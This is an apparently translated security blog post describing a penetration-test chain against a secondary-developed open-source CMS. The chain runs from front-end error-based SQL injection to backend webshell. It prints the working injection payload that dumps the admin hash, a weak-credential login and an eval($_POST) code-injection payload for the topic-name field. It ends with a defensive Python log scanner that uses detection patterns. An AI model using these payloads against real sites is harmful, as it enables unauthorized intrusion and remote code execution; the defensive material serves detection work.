Under the new deployment architecture, how do you get a shell?

I was chatting with a friend about how upgrades to server deployment architecture affect security. From the simplest single server, to separate application, database and file servers; from a local server room to a cloud provider's product matrix; from virtualized deployments to containers, things have been moving in a safer direction.

This post tries to build such a scenario: the source code lives on ECS, the database on RDS, and unstructured data on HDFS. The conventional getshell techniques, such as writing a file through SQL injection, arbitrary file upload, and file inclusion, no longer seem to work. In this situation, how do you break through the system's deployment architecture and get a webshell on the site?

Practical approach: black-box penetration testing + white-box code audit

During information gathering, find the site's management backend. From the source of the login page, learn that the system is probably a secondary development of an open-source CMS. Download the source code of that open-source CMS for a code audit, and go from front-end SQL injection to backend getshell.

Exploitation process on the CMS demo site:

1. Use the front-end SQL injection vulnerability and fill in the following payload in the search field:

keyword=1%' or (select 1 from (select count(*),concat((concat(0x5e5e21,(select concat(0x7c,password,0x7c) from xxxxx_user where uid=1),0x215e5e)),floor(rand(0)*2))x from information_schema.tables group by x)a)#

The md5 value 21232f297a57a5a743894a0e4a801fc3 decrypts to admin.

Use the weak password admin / admin to log in to the backend successfully.

2. After logging in to the backend, go to Home - Topic Management - Create Topic, and fill in the topic name with the payload: test111',eval($_POST[g]),//

3. Access the webshell address:

PS: The vulnerability in the case cited here was reported to the vendor in 2018.11 and has since been fixed.
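As an added defender-side example (not code from the original post or the CMS), the detection logic below checks an access log for the two traces this chain leaves: the error-based injection signature in the search query (the floor(rand(0)*2) + group by duplicate-key trick reading information_schema, usually paired with a 5xx because the DB error must reach the page) and PHP code submitted in a content field such as the topic name. The log lines and the signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures of the error-based injection shown above and of PHP code submitted
# in content fields. All checks run on the URL-decoded text.
SQLI_SIGNATURES = {
    "rand_floor":   re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "info_schema":  re.compile(r"information_schema\.", re.I),
    "group_by":     re.compile(r"group\s+by\s+\w+", re.I),
    "quote_or_sel": re.compile(r"['\"]\s*or\s*\(?\s*select\b", re.I),
}
PHP_SIGNATURE = re.compile(r"<\?php|\beval\s*\(|\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def sqli_hits(text):
    """Return the names of injection signatures present in the decoded text."""
    decoded = unquote_plus(text)
    return sorted(name for name, rx in SQLI_SIGNATURES.items() if rx.search(decoded))

def inspect_access_log(line):
    """Flag a request when two or more signatures appear in its query string.
    The status is reported too: error-based injection relies on the DB error
    surfacing in the response, so a 5xx on a search endpoint is corroborating."""
    m = LOG_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    hits = sqli_hits(target.query)
    if len(hits) < 2:
        return None
    return {"path": target.path, "signatures": hits, "status": int(m.group("status")),
            "db_error_surfaced": m.group("status").startswith("5")}

def php_in_field(value):
    """True if a submitted content field (e.g. a topic name) carries PHP code.
    A template generator must never write such a value into an executable file."""
    return PHP_SIGNATURE.search(unquote_plus(value)) is not None

# Constructed sample lines (not real traffic); the first carries the search payload above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Nov/2018:10:00:01 +0800] "GET /search.php?keyword=1%25%27+or+(select+1+from+(select+count(*),concat(0x5e5e21,(select+concat(0x7c,password,0x7c)+from+xxxxx_user+where+uid%3D1),0x215e5e),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 HTTP/1.1" 500 611',
    '10.0.0.6 - - [01/Nov/2018:10:00:02 +0800] "GET /search.php?keyword=cloud+security HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_access_log(line))
    print(php_in_field("test111',eval($_POST[g]),//"))
```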


Upgrading the technology infrastructure can reduce security risk to a large extent, and black-box penetration will undoubtedly become harder. The microservice architecture that is popular now will see more and more usage scenarios, and that is a big challenge: you think you have obtained permissions over the whole system, when in fact you may only have compromised one service.

I like this saying, short and instructive: vulnerabilities are found in the details, problems are solved at the architecture level, and risk is controlled by process.


Source: www.cnblogs.com/xiaozi/p/11604814.html